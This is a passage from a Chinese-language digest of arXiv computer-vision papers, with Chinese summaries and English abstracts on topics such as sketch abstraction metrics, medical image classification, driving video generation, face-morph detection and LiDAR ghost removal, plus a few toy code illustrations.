作者: Jiho Park,Sieun Choi,Jaeyoon Seo,Minho Sohn,Yeana Kim,Jihie Kim
机构: Dongguk University (东国大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:A sketch is a distilled form of visual abstraction that conveys core concepts through simplified yet purposeful strokes while omitting extraneous detail. Despite its expressive power, quantifying the efficiency of semantic abstraction in sketches remains challenging. Existing evaluation methods that rely on reference images, low-level visual features, or recognition accuracy do not capture abstraction, the defining property of sketches. To address these limitations, we introduce SEA (Sketch Evaluation metric for Abstraction efficiency), a reference-free metric that assesses how economically a sketch represents class-defining visual elements while preserving semantic recognizability. These elements are derived per class from commonsense knowledge about features typically depicted in sketches. SEA leverages a visual question answering model to determine the presence of each element and returns a quantitative score that reflects semantic retention under visual economy. To support this metric, we present CommonSketch, the first semantically annotated sketch dataset, comprising 23,100 human-drawn sketches across 300 classes, each paired with a caption and element-level annotations. Experiments show that SEA aligns closely with human judgments and reliably discriminates levels of abstraction efficiency, while CommonSketch serves as a benchmark providing systematic evaluation of element-level sketch understanding across various vision-language models.
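SEA 的核心思想——统计类别定义性元素在草图中的保留比例——可用如下玩具代码示意。其中 VQA 模型用一个假想的查表函数代替,评分形式也并非论文原式,仅表达"视觉经济下的语义保留"这一思路:

```python
# Toy sketch of element-level presence scoring (NOT the paper's exact formula).
def element_presence_score(sketch_answers, class_elements):
    """Fraction of class-defining elements a VQA model judges present.

    sketch_answers: dict element -> bool, standing in for VQA "is X drawn?" answers.
    class_elements: the commonsense element list for the sketch's class.
    """
    present = sum(1 for e in class_elements if sketch_answers.get(e, False))
    return present / len(class_elements)

# Hypothetical commonsense elements for class "cat".
cat_elements = ["ears", "whiskers", "tail", "eyes"]
# A highly abstract sketch that still keeps 3 of the 4 defining elements.
answers = {"ears": True, "whiskers": True, "tail": False, "eyes": True}
score = element_presence_score(answers, cat_elements)
```

实际的 SEA 指标由 VQA 模型自动判定每个元素是否存在,并在此基础上权衡抽象效率,远比此处的比例统计精细。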
[CV-48] Optimized Weighted Voting System for Brain Tumor Classification Using MRI Images
【速读】:该论文旨在解决从MRI图像中准确分类脑肿瘤的问题,以支持有效的诊断与治疗规划。其解决方案的关键在于提出一种加权集成学习方法,通过融合深度学习模型(如ResNet101、DenseNet121、Xception、CNN-MRI、ResNet50结合边缘增强图像)与传统机器学习模型(如SVM和KNN结合HOG特征),并采用基于个体准确率的加权投票机制,使表现更优的模型在最终决策中拥有更大影响力,从而提升整体分类性能。此外,引入Balance Contrast Enhancement、K-means聚类和Canny边缘检测等图像处理技术进一步优化特征提取,实验表明该方法在Figshare和Kaggle MRI数据集上达到了当前最优的分类准确率。
链接: https://arxiv.org/abs/2603.28357
作者: Ha Anh Vu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:The accurate classification of brain tumors from MRI scans is essential for effective diagnosis and treatment planning. This paper presents a weighted ensemble learning approach that combines deep learning and traditional machine learning models to improve classification performance. The proposed system integrates multiple classifiers, including ResNet101, DenseNet121, Xception, CNN-MRI, and ResNet50 with edge-enhanced images, SVM, and KNN with HOG features. A weighted voting mechanism assigns higher influence to models with better individual accuracy, ensuring robust decision-making. Image processing techniques such as Balance Contrast Enhancement, K-means clustering, and Canny edge detection are applied to enhance feature extraction. Experimental evaluations on the Figshare and Kaggle MRI datasets demonstrate that the proposed method achieves state-of-the-art accuracy, outperforming existing models. These findings highlight the potential of ensemble-based learning for improving brain tumor classification, offering a reliable and scalable framework for medical image analysis.
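摘要中"按个体准确率加权投票"的机制可示意如下:权重直接取各模型的验证准确率并归一化,对各模型的类别概率做加权平均后取 argmax。这属于加权投票的常见做法,未必与原文实现细节完全一致:

```python
import numpy as np

def weighted_vote(probs_per_model, accuracies):
    """Combine per-model class probabilities with accuracy-based weights."""
    w = np.asarray(accuracies, dtype=float)
    w = w / w.sum()                               # normalize weights
    stacked = np.stack(probs_per_model)           # (models, classes)
    fused = (w[:, None] * stacked).sum(axis=0)    # weighted average
    return int(np.argmax(fused)), fused

# Three hypothetical classifiers over 3 tumor classes; the more accurate
# models pull the final decision toward class 1.
p1 = np.array([0.6, 0.3, 0.1])   # weaker model,   acc 0.80
p2 = np.array([0.2, 0.7, 0.1])   # stronger model, acc 0.95
p3 = np.array([0.1, 0.8, 0.1])   # stronger model, acc 0.93
label, fused = weighted_vote([p1, p2, p3], [0.80, 0.95, 0.93])   # label == 1
```

尽管最弱的模型投给了类别 0,两个高准确率模型的更大权重使融合结果落在类别 1 上,体现了"表现更优的模型拥有更大影响力"。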
[CV-49] VistaGEN: Consistent Driving Video Generation with Fine-Grained Control Using Multiview Visual-Language Reasoning
【速读】:该论文旨在解决长视频生成中缺乏细粒度对象级控制能力的问题,尤其是在多样化驾驶场景下难以保持时空一致性。现有方法虽在可控性、分辨率和时长方面取得进展,但无法精确操控特定实体(如3D物体、图像或文本描述),且在长时间序列中易出现不一致现象。解决方案的关键在于引入多视角视觉-语言推理机制,通过将视觉-语言特征注入多视角视频生成器以实现细粒度控制,并提出多视角视觉-语言评估器(Multiview Vision-Language Evaluator, MV-VLM)来自动评估生成内容的时空一致性,从而构建“生成-评估-再生”的闭环机制,确保输出高质量且连贯的驾驶视频,同时引入对象级精修模块对不合格结果进行迭代优化,显著提升长尾对象的生成效果与整体一致性。
链接: https://arxiv.org/abs/2603.28353
作者: Li-Heng Chen,Ke Cheng,Yahui Liu,Lei Shi,Shi-Sheng Huang,Hongbo Fu
机构: Hong Kong University of Science and Technology (香港科技大学); Meituan, Inc. (美团); Beijing Normal University (北京师范大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Driving video generation has achieved much progress in controllability, video resolution, and length, but fails to support fine-grained object-level controllability for diverse driving videos, while preserving the spatiotemporal consistency, especially in long video generation. In this paper, we present a new driving video generation technique, called VistaGEN, which enables fine-grained control of specific entities, including 3D objects, images, and text descriptions, while maintaining spatiotemporal consistency in long video sequences. Our key innovation is the incorporation of multiview visual-language reasoning into the long driving video generation. To this end, we inject visual-language features into a multiview video generator to enable fine-grained controllability. More importantly, we propose a multiview vision-language evaluator (MV-VLM) to intelligently and automatically evaluate spatiotemporal consistency of the generated content, thus formulating a novel generation-evaluation-regeneration closed-loop generation mechanism. This mechanism ensures high-quality, coherent outputs, facilitating the creation of complex and reliable driving scenarios. Besides, within the closed-loop generation, we introduce an object-level refinement module to refine the unsatisfied results evaluated from the MV-VLM and then feed them back to the video generator for regeneration. Extensive evaluation shows that our VistaGEN achieves diverse driving video generation results with fine-grained controllability, especially for long-tail objects, and much better spatiotemporal consistency than previous approaches.
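摘要中的"生成-评估-再生成"闭环在控制流层面即一个带反馈的循环:生成,交给评估器打分,不合格则由精修模块修正后再生成。下面用玩具桩函数示意这一控制流(仅为结构示意,三个函数均为假想替身,并非 VistaGEN 的实际模块):

```python
def closed_loop_generate(generate, evaluate, refine, max_rounds=3):
    """Generate -> evaluate -> refine loop, a toy sketch of a
    generation-evaluation-regeneration mechanism."""
    video = generate(None)
    for _ in range(max_rounds):
        ok, feedback = evaluate(video)            # e.g. MV-VLM consistency check
        if ok:
            break
        video = refine(video, feedback)           # object-level refinement, regen
    return video

# Toy stand-ins: quality improves by 1 per refinement round, passes at >= 2.
gen = lambda _: {"quality": 0}
ev = lambda v: (v["quality"] >= 2, "low consistency")
ref = lambda v, fb: {"quality": v["quality"] + 1}
out = closed_loop_generate(gen, ev, ref)          # out["quality"] == 2
```

真实系统中,`evaluate` 由多视角视觉-语言评估器(MV-VLM)承担,`refine` 对应对象级精修模块,循环终止条件则基于时空一致性判定。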
[CV-50] Integrating Multimodal Large Language Model Knowledge into Amodal Completion
【速读】:该论文旨在解决**非可见部分补全(amodal completion)**问题,即在图像中重建被遮挡的人或物体的缺失区域。传统方法要么仅依赖视觉生成模型的图像生成能力(缺乏对现实世界的物理知识),要么仅在分割阶段引入先验知识,无法有效指导补全过程。解决方案的关键在于提出AmodalCG框架,该框架利用多模态大语言模型(Multimodal Large Language Models, MLLMs)提供的现实世界知识来引导补全:首先判断目标物体是否严重遮挡以决定是否调用MLLM;若需引导,则由MLLM推理缺失区域的范围与内容;最后通过视觉生成模型整合这些信息并迭代优化补全结果,从而显著提升补全质量。
链接: https://arxiv.org/abs/2603.28333
作者: Heecheol Yun,Eunho Yang
机构: KAIST; AITRICS
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:With the widespread adoption of autonomous vehicles and robotics, amodal completion, which reconstructs the occluded parts of people and objects in an image, has become increasingly crucial. Just as humans infer hidden regions based on prior experience and common sense, this task inherently requires physical knowledge about real-world entities. However, existing approaches either depend solely on the image generation ability of visual generative models, which lack such knowledge, or leverage it only during the segmentation stage, preventing it from explicitly guiding the completion process. To address this, we propose AmodalCG, a novel framework that harnesses the real-world knowledge of Multimodal Large Language Models (MLLMs) to guide amodal completion. Our framework first assesses the extent of occlusion to selectively invoke MLLM guidance only when the target object is heavily occluded. If guidance is required, the framework further incorporates MLLMs to reason about both the (1) extent and (2) content of the missing regions. Finally, a visual generative model integrates these guidance and iteratively refines imperfect completions that may arise from inaccurate MLLM guidance. Experimental results on various real-world images show impressive improvements compared to all existing works, suggesting MLLMs as a promising direction for addressing challenging amodal completion.
[CV-51] SFDemorpher: Generalizable Face Demorphing for Operational Morphing Attack Detection
【速读】:该论文旨在解决人脸伪造攻击(face morphing attacks)对生物识别安全构成的威胁,特别是针对文档颁发至边境管控阶段中因身份混杂导致的验证漏洞问题。现有检测方法在实际部署中存在泛化能力不足的问题,主要受限于训练数据稀缺及假设所有输入均为伪造样本的局限性。解决方案的关键在于提出SFDemorpher框架,通过在联合StyleGAN潜在空间与高维特征空间中进行身份解耦(identity disentanglement),并采用双通道训练策略同时处理伪造和真实文档样本,结合以合成身份为主的混合语料库增强模型对未见分布的鲁棒性,从而显著提升检测性能与可解释性。
链接: https://arxiv.org/abs/2603.28322
作者: Raul Ismayilov,Luuk Spreeuwers
机构: University of Twente (特温特大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Face morphing attacks compromise biometric security by creating document images that verify against multiple identities, posing significant risks from document issuance to border control. Differential Morphing Attack Detection (D-MAD) offers an effective countermeasure, particularly when employing face demorphing to disentangle identities blended in the morph. However, existing methods lack operational generalizability due to limited training data and the assumption that all document inputs are morphs. This paper presents SFDemorpher, a framework designed for the operational deployment of face demorphing for D-MAD that performs identity disentanglement within joint StyleGAN latent and high-dimensional feature spaces. We introduce a dual-pass training strategy handling both morphed and bona fide documents, leveraging a hybrid corpus with predominantly synthetic identities to enhance robustness against unseen distributions. Extensive evaluation confirms state-of-the-art generalizability across unseen identities, diverse capture conditions, and 13 morphing techniques, spanning both border verification and the challenging document enrollment stage. Our framework achieves superior D-MAD performance by widening the margin between the score distributions of bona fide and morphed samples while providing high-fidelity visual reconstructions facilitating explainability.
[CV-52] Beyond Scanpaths: Graph-Based Gaze Simulation in Dynamic Scenes
【速读】:该论文旨在解决现有计算机视觉应用中人类注意力建模不准确的问题,尤其是在汽车安全领域,传统方法通常将注视点简化为显著性图或扫描路径,仅隐式地处理注视动态。其核心解决方案是将注视建模视为一个自回归动力系统,显式地对原始注视轨迹进行时间上的展开,并以注视历史和环境演化为条件。关键创新在于引入了基于注视中心图的Affinity Relation Transformer(ART)来捕捉驾驶员注视、交通物体与道路结构之间的异质交互关系,并通过Object Density Network(ODN)预测下一步的注视分布,从而有效建模复杂环境中注意力转移的随机性和对象中心特性。该方法直接在原始注视数据上训练,无需固定点过滤,生成更自然的注视轨迹、扫描路径和显著性图,为动态环境中人类注意力的时序建模提供了新范式。
链接: https://arxiv.org/abs/2603.28319
作者: Luke Palmer,Petar Palasek,Hazem Abdelkawy
机构: GlimpseML; Toyota Motor Europe
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurately modelling human attention is essential for numerous computer vision applications, particularly in the domain of automotive safety. Existing methods typically collapse gaze into saliency maps or scanpaths, treating gaze dynamics only implicitly. We instead formulate gaze modelling as an autoregressive dynamical system and explicitly unroll raw gaze trajectories over time, conditioned on both gaze history and the evolving environment. Driving scenes are represented as gaze-centric graphs processed by the Affinity Relation Transformer (ART), a heterogeneous graph transformer that models interactions between driver gaze, traffic objects, and road structure. We further introduce the Object Density Network (ODN) to predict next-step gaze distributions, capturing the stochastic and object-centric nature of attentional shifts in complex environments. We also release Focus100, a new dataset of raw gaze data from 30 participants viewing egocentric driving footage. Trained directly on raw gaze, without fixation filtering, our unified approach produces more natural gaze trajectories, scanpath dynamics, and saliency maps than existing attention models, offering valuable insights for the temporal modelling of human attention in dynamic environments.
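将注视建模为自回归动力系统,意味着逐步展开 g_{t+1} = f(g_{≤t}, 环境_t),每一步都以注视历史与当前场景为条件。下面用一个线性玩具动力学示意这种 rollout(ART/ODN 的真实结构远比这里的 `toy_step` 复杂):

```python
import numpy as np

def rollout(g0, step_fn, env_seq):
    """Autoregressively unroll gaze: each step conditions on history + scene."""
    traj = [np.asarray(g0, dtype=float)]
    for env in env_seq:
        traj.append(step_fn(traj, env))   # next gaze from full history + env
    return np.stack(traj)

# Toy dynamics: drift a fixed fraction of the way toward the salient object.
def toy_step(history, salient_xy, alpha=0.3):
    g = history[-1]
    return g + alpha * (np.asarray(salient_xy, dtype=float) - g)

env = [(1.0, 0.0)] * 5                    # salient object fixed at (1, 0)
traj = rollout((0.0, 0.0), toy_step, env)  # gaze converges toward (1, 0)
```

这一展开方式与将注视压缩为显著性图的做法不同:轨迹本身被显式建模,随机性(论文中由 ODN 的分布预测承担)可以在每步采样中引入。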
[CV-53] Prototype-Enhanced Multi-View Learning for Thyroid Nodule Ultrasound Classification
【速读】:该论文旨在解决甲状腺结节超声影像分类中深度学习模型在跨设备或跨临床环境部署时鲁棒性与泛化能力不足的问题(即模型容易捕捉到图像异质性带来的虚假相关性,而非可靠的诊断特征)。其解决方案的关键在于提出了一种原型增强的多视角学习框架(PEMV-thyroid),通过从多个特征视角学习互补表示,并利用混合原型信息进行决策边界修正,从而在异质成像条件下实现更稳定的表征学习,显著提升了模型在跨域场景下的诊断准确性和泛化性能。
链接: https://arxiv.org/abs/2603.28315
作者: Yangmei Chen,Zhongyuan Zhang,Xikun Zhang,Xinyu Hao,Mingliang Hou,Renqiang Luo,Ziqi Xu
机构: Jilin University (吉林大学); RMIT University (皇家墨尔本理工大学); Dalian University of Technology (大连理工大学); Jinan University (暨南大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 6 pages, IWCMC 2026 accepted
Abstract:Thyroid nodule classification using ultrasound imaging is essential for early diagnosis and clinical decision-making; however, despite promising performance on in-distribution data, existing deep learning methods often exhibit limited robustness and generalisation when deployed across different ultrasound devices or clinical environments. This limitation is mainly attributed to the pronounced heterogeneity of thyroid ultrasound images, which can lead models to capture spurious correlations rather than reliable diagnostic cues. To address this challenge, we propose PEMV-thyroid, a Prototype-Enhanced Multi-View learning framework that accounts for data heterogeneity by learning complementary representations from multiple feature perspectives and refining decision boundaries through a prototype-based correction mechanism with mixed prototype information. By integrating multi-view representations with prototype-level guidance, the proposed approach enables more stable representation learning under heterogeneous imaging conditions. Extensive experiments on multiple thyroid ultrasound datasets demonstrate that PEMV-thyroid consistently outperforms state-of-the-art methods, particularly in cross-device and cross-domain evaluation scenarios, leading to improved diagnostic accuracy and generalisation performance in real-world clinical settings. The source code is available at this https URL.
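摘要中的"基于原型的决策修正"通常建立在最近原型判别之上:类原型取该类特征的均值,样本归入原型最近的类别。下面给出这一通用思路的极简示意(并非 PEMV-thyroid 的混合原型机制本身):

```python
import numpy as np

def class_prototypes(features, labels, n_classes):
    """Prototype = mean feature vector of each class."""
    return np.stack([features[labels == c].mean(axis=0) for c in range(n_classes)])

def nearest_prototype(x, prototypes):
    """Assign a sample to the class with the closest prototype."""
    d = np.linalg.norm(prototypes - x, axis=1)
    return int(np.argmin(d))

# Toy 2-D features for two classes (e.g. benign vs malignant embeddings).
feats = np.array([[0.0, 0.0], [0.2, 0.1], [1.0, 1.0], [0.9, 1.1]])
labels = np.array([0, 0, 1, 1])
protos = class_prototypes(feats, labels, 2)
pred = nearest_prototype(np.array([0.8, 0.9]), protos)   # closest to class 1
```

论文进一步利用混合原型信息修正决策边界并结合多视角表示,此处仅展示原型判别这一基础构件。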
[CV-54] DinoDental: Benchmarking DINOv3 as a Unified Vision Encoder for Dental Image Analysis
【速读】:该论文旨在解决牙科影像领域中专家标注数据稀缺且成本高昂的问题,从而限制了人工智能(AI)在牙科中的发展。其解决方案的关键在于引入DinoDental这一统一基准,系统评估自监督视觉基础模型DINOv3是否可作为无需领域特定预训练的即插即用编码器,在全景X光片和口内照片等多种牙科图像任务(包括分类、检测与实例分割)中实现可靠迁移。实验表明,DINOv3在牙科图像分析中具备强大通用性,尤其在口内图像理解及边界敏感的密集预测任务上优势显著,同时通过缩放模型规模、调整输入分辨率及对比冻结特征、全量微调与低秩适应(LoRA)等策略,验证了其高效适配潜力。
链接: https://arxiv.org/abs/2603.28297
作者: Kun Tang,Xinquan Yang,Mianjie Zheng,Xuefen Liu,Xuguang Li,Xiaoqi Guo,Ruihan Chen,Linlin Shen,He Meng
机构: 1. Tsinghua University (清华大学); 2. Peking University (北京大学); 3. Chinese Academy of Sciences (中国科学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The scarcity and high cost of expert annotations in dental imaging present a significant challenge for the development of AI in dentistry. DINOv3, a state-of-the-art, self-supervised vision foundation model pre-trained on 1.7 billion images, offers a promising pathway to mitigate this issue. However, its reliability when transferred to the dental domain, with its unique imaging characteristics and clinical subtleties, remains unclear. To address this, we introduce DinoDental, a unified benchmark designed to systematically evaluate whether DINOv3 can serve as a reliable, off-the-shelf encoder for comprehensive dental image analysis without requiring domain-specific pre-training. Constructed from multiple public datasets, DinoDental covers a wide range of tasks, including classification, detection, and instance segmentation on both panoramic radiographs and intraoral photographs. We further analyze the model’s transfer performance by scaling its size and input resolution, and by comparing different adaptation strategies, including frozen features, full fine-tuning, and the parameter-efficient Low-Rank Adaptation (LoRA) method. Our experiments show that DINOv3 can serve as a strong unified encoder for dental image analysis across both panoramic radiographs and intraoral photographs, remaining competitive across tasks while showing particularly clear advantages for intraoral image understanding and boundary-sensitive dense prediction. Collectively, DinoDental provides a systematic framework for comprehensively evaluating DINOv3 in dental analysis, establishing a foundational benchmark to guide efficient and effective model selection and adaptation for the dental AI community.
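摘要中比较的 LoRA(低秩适应)即冻结原权重 W,只训练低秩增量 ΔW = B·A,前向为 h = Wx + (α/r)·B(Ax)。下面用 numpy 示意这一思想(缩放因子与 B 零初始化遵循 LoRA 的常见约定,维度均为随意取的小例子):

```python
import numpy as np

rng = np.random.default_rng(0)
d_out, d_in, r, alpha = 6, 4, 2, 8

W = rng.normal(size=(d_out, d_in))          # frozen pretrained weight
A = rng.normal(size=(r, d_in)) * 0.01       # trainable down-projection
B = np.zeros((d_out, r))                    # zero-init so delta-W = 0 at start

def lora_forward(x):
    return W @ x + (alpha / r) * (B @ (A @ x))

x = rng.normal(size=d_in)
y0 = lora_forward(x)                        # identical to frozen model at init
B = rng.normal(size=(d_out, r))             # pretend B was updated by training
y1 = lora_forward(x)                        # now the low-rank update kicks in
```

由于 B 初始化为零,训练开始时模型输出与冻结模型完全一致;可训练参数量只有 r·(d_in + d_out),这正是其参数高效的来源。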
[CV-55] TerraSky3D: Multi-View Reconstructions of European Landmarks in 4K CVPR
【速读】:该论文旨在解决当前3D重建相关研究中高质量、大规模公共数据集稀缺的问题。现有数据集普遍存在分辨率低、场景数量有限、图像质量不一(因来源于互联网)或仅适用于特定采集场景等局限性,难以满足日益复杂的3D重建算法训练与评估需求。为此,作者构建了TerraSky3D数据集,其关键在于提供了5万张高分辨率图像,覆盖150个地面、航空及混合视角的场景,聚焦欧洲地标建筑,并配套精确的相机标定参数、位姿信息和深度图,从而为训练和评估现代3D重建流水线提供具有挑战性的基准数据。
链接: https://arxiv.org/abs/2603.28287
作者: Mattia D’Urso,Yuxi Hu,Christian Sormann,Mattia Rossi,Friedrich Fraundorfer
机构: Graz University of Technology (格拉茨工业大学); Sony (索尼)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at 3DMV at CVPR Workshop 2026
Abstract:Despite the growing need for data of more and more sophisticated 3D reconstruction pipelines, we can still observe a scarcity of suitable public datasets. Existing 3D datasets are either low resolution, limited to a small amount of scenes, based on images of varying quality because retrieved from the internet, or limited to specific capturing scenarios. Motivated by this lack of suitable 3D datasets, we captured TerraSky3D, a high-resolution large-scale 3D reconstruction dataset comprising 50,000 images divided into 150 ground, aerial, and mixed scenes. The dataset focuses on European landmarks and comes with curated calibration data, camera poses, and depth maps. TerraSky3D tries to answer the need for challenging dataset that can be used to train and evaluate 3D reconstruction-related pipelines.
[CV-56] DiffAttn: Diffusion-Based Drivers' Visual Attention Prediction with LLM-Enhanced Semantic Reasoning
【速读】:该论文旨在解决智能车辆中驾驶员视觉注意力预测的准确性问题,以更好地模拟人类驾驶者的感知模式并提升对潜在危险的预判能力。其核心挑战在于如何建模复杂的局部与全局场景特征,并增强对安全关键线索的敏感性。解决方案的关键在于提出DiffAttn框架,该框架将注意力预测任务建模为条件扩散去噪过程,采用Swin Transformer作为编码器提取多尺度特征,并设计融合特征金字塔的解码器实现跨层交互与密集多尺度条件扩散,从而联合优化去噪学习和细粒度场景上下文建模;同时引入大语言模型(Large Language Model, LLM)层增强自上而下的语义推理能力,显著提升对安全相关提示的响应灵敏度。
链接: https://arxiv.org/abs/2603.28251
作者: Weimin Liu,Qingkun Li,Jiyuan Qiu,Wenjun Wang,Joshua H. Meng
机构: Tsinghua University (清华大学); Chinese Academy of Sciences (中国科学院); University of Copenhagen (哥本哈根大学); University of California, Berkeley (加州大学伯克利分校)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Drivers’ visual attention provides critical cues for anticipating latent hazards and directly shapes decision-making and control maneuvers, where its absence can compromise traffic safety. To emulate drivers’ perception patterns and advance visual attention prediction for intelligent vehicles, we propose DiffAttn, a diffusion-based framework that formulates this task as a conditional diffusion-denoising process, enabling more accurate modeling of drivers’ attention. To capture both local and global scene features, we adopt Swin Transformer as encoder and design a decoder that combines a Feature Fusion Pyramid for cross-layer interaction with dense, multi-scale conditional diffusion to jointly enhance denoising learning and model fine-grained local and global scene contexts. Additionally, a large language model (LLM) layer is incorporated to enhance top-down semantic reasoning and improve sensitivity to safety-critical cues. Extensive experiments on four public datasets demonstrate that DiffAttn achieves state-of-the-art (SoTA) performance, surpassing most video-based, top-down-feature-driven, and LLM-enhanced baselines. Our framework further supports interpretable driver-centric scene understanding and has the potential to improve in-cabin human-machine interaction, risk perception, and drivers’ state measurement in intelligent vehicles.
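DiffAttn 将注意力预测建模为条件扩散去噪过程。扩散模型的前向加噪有标准闭式 q(x_t|x_0):x_t = √ᾱ_t·x_0 + √(1−ᾱ_t)·ε。下面示意该通用公式(线性噪声调度为 DDPM 常见设置,与 DiffAttn 的具体条件化结构无关):

```python
import numpy as np

rng = np.random.default_rng(0)
T = 100
betas = np.linspace(1e-4, 0.02, T)           # standard linear noise schedule
alphas_bar = np.cumprod(1.0 - betas)         # cumulative product: alpha-bar_t

def q_sample(x0, t, eps):
    """Closed-form forward diffusion: x_t = sqrt(ab_t)*x0 + sqrt(1-ab_t)*eps."""
    a = alphas_bar[t]
    return np.sqrt(a) * x0 + np.sqrt(1.0 - a) * eps

x0 = rng.normal(size=16)                     # e.g. a flattened attention map
eps = rng.normal(size=16)
x_early = q_sample(x0, 0, eps)               # almost no noise yet
x_late = q_sample(x0, T - 1, eps)            # mostly noise
```

去噪网络学习的正是该过程的逆向;DiffAttn 的贡献在于将多尺度场景特征与 LLM 语义作为条件注入这一去噪过程。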
[CV-57] TwinMixing: A Shuffle-Aware Feature Interaction Model for Multi-Task Segmentation
【速读】:该论文旨在解决自动驾驶中高效且高精度的语义分割问题,特别是针对可行驶区域(drivable-area)和车道(lane)分割任务,在低成本硬件上实现实时性能与准确率之间的平衡。解决方案的关键在于提出TwinMixing模型,其核心创新包括:1)采用共享编码器与任务专用解码器结构,实现特征共享与任务特异性优化;2)在编码器中设计高效金字塔混合(Efficient Pyramid Mixing, EPM)模块,通过分组卷积、深度可分离空洞卷积和通道混洗操作,在低计算成本下扩展感受野;3)每个解码器引入双分支上采样(Dual-Branch Upsampling, DBU)块,结合可学习的转置卷积精细分支与无参数双线性插值粗粒度分支,实现细节丰富且空间一致的特征重建。该设计使模型在保持极低参数量(如base配置仅0.43M参数)和计算复杂度(3.95 GFLOPs)的同时,达到优异的分割性能(drivable-area mIoU达92.0%,lane IoU达32.3%)。
链接: https://arxiv.org/abs/2603.28233
作者: Minh-Khoi Do,Huy Che,Dinh-Duy Phan,Duc-Khai Lam,Duc-Lung Vu
机构: University of Information Technology (越南信息技术大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Accurate and efficient perception is essential for autonomous driving, where segmentation tasks such as drivable-area and lane segmentation provide critical cues for motion planning and control. However, achieving high segmentation accuracy while maintaining real-time performance on low-cost hardware remains a challenging problem. To address this issue, we introduce TwinMixing, a lightweight multi-task segmentation model designed explicitly for drivable-area and lane segmentation. The proposed network features a shared encoder and task-specific decoders, enabling both feature sharing and task specialization. Within the encoder, we propose an Efficient Pyramid Mixing (EPM) module that enhances multi-scale feature extraction through a combination of grouped convolutions, depthwise dilated convolutions and channel shuffle operations, effectively expanding the receptive field while minimizing computational cost. Each decoder adopts a Dual-Branch Upsampling (DBU) Block composed of a learnable transposed convolution-based Fine detailed branch and a parameter-free bilinear interpolation-based Coarse grained branch, achieving detailed yet spatially consistent feature reconstruction. Extensive experiments on the BDD100K dataset validate the effectiveness of TwinMixing across three configurations - tiny, base, and large. Among them, the base configuration achieves the best trade-off between accuracy and computational efficiency, reaching 92.0% mIoU for drivable-area segmentation and 32.3% IoU for lane segmentation with only 0.43M parameters and 3.95 GFLOPs. Moreover, TwinMixing consistently outperforms existing segmentation models on the same tasks, as illustrated in Fig. 1. Thanks to its compact and modular design, TwinMixing demonstrates strong potential for real-time deployment in autonomous driving and embedded perception systems. The source code: this https URL.
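EPM 模块中的 channel shuffle 是源自 ShuffleNet 的经典操作:通过 reshape–转置–flatten 让分组卷积后的通道跨组交换信息。该操作本身定义明确,可示意如下:

```python
import numpy as np

def channel_shuffle(x, groups):
    """ShuffleNet-style channel shuffle for an (N, C, H, W) tensor."""
    n, c, h, w = x.shape
    assert c % groups == 0
    x = x.reshape(n, groups, c // groups, h, w)
    x = x.transpose(0, 2, 1, 3, 4)            # swap the group and channel axes
    return x.reshape(n, c, h, w)

x = np.arange(6, dtype=float).reshape(1, 6, 1, 1)   # channels 0..5
y = channel_shuffle(x, groups=2)
# Channels interleave across the two groups: 0, 3, 1, 4, 2, 5.
```

分组卷积将计算量降为 1/groups,但各组通道彼此隔离;shuffle 以零参数、零乘加的代价恢复了跨组信息流,这正是 EPM 在低计算成本下扩大感受野的配套手段之一。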
[CV-58] Ghost-FWL: A Large-Scale Full-Waveform LiDAR Dataset for Ghost Detection and Removal CVPR2026
【速读】:该论文旨在解决移动式激光雷达(LiDAR)在复杂场景中因玻璃和高反射表面导致的多路径激光回波所产生虚假点云(ghost points)问题,这些问题严重损害了三维建图与定位精度。传统去鬼方法依赖密集点云中的几何一致性,在移动LiDAR稀疏且动态的数据上失效。论文的关键解决方案是利用全波形激光雷达(full-waveform LiDAR, FWL),其可捕捉完整的时域强度波形而非仅峰值距离信息,从而提供区分真实反射与鬼点的关键线索。研究构建了首个大规模标注的移动FWL数据集Ghost-FWL(含24K帧、75亿个峰值级标注),并提出基于FWL的基线模型及FWL-MAE自监督表示学习方法,实验证明该方案显著提升鬼点去除准确率,并有效改善下游任务如LiDAR-SLAM(轨迹误差降低66%)和3D目标检测(误报减少50倍)。
链接: https://arxiv.org/abs/2603.28224
作者: Kazuma Ikeda,Ryosei Hara,Rokuto Nagata,Ozora Sako,Zihao Ding,Takahiro Kado,Ibuki Fujioka,Taro Beppu,Mariko Isogawa,Kentaro Yoshioka
机构: Keio University (庆应义塾大学); Sony Semiconductor Solutions (索尼半导体解决方案)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR 2026 (Main)
Abstract:LiDAR has become an essential sensing modality in autonomous driving, robotics, and smart-city applications. However, ghost points (or ghosts), which are false reflections caused by multi-path laser returns from glass and reflective surfaces, severely degrade 3D mapping and localization accuracy. Prior ghost removal relies on geometric consistency in dense point clouds, failing on mobile LiDAR’s sparse, dynamic data. We address this by exploiting full-waveform LiDAR (FWL), which captures complete temporal intensity profiles rather than just peak distances, providing crucial cues for distinguishing ghosts from genuine reflections in mobile scenarios. As this is a new task, we present Ghost-FWL, the first and largest annotated mobile FWL dataset for ghost detection and removal. Ghost-FWL comprises 24K frames across 10 diverse scenes with 7.5 billion peak-level annotations, which is 100x larger than existing annotated FWL datasets. Benefiting from this large-scale dataset, we establish a FWL-based baseline model for ghost detection and propose FWL-MAE, a masked autoencoder for efficient self-supervised representation learning on FWL data. Experiments show that our baseline outperforms existing methods in ghost removal accuracy, and our ghost removal further enhances downstream tasks such as LiDAR-based SLAM (66% trajectory error reduction) and 3D object detection (50x false positive reduction). The dataset and code are publicly available and can be accessed via the project page: this https URL
[CV-59] Explaining CLIP Zero-shot Predictions Through Concepts CVPR2026
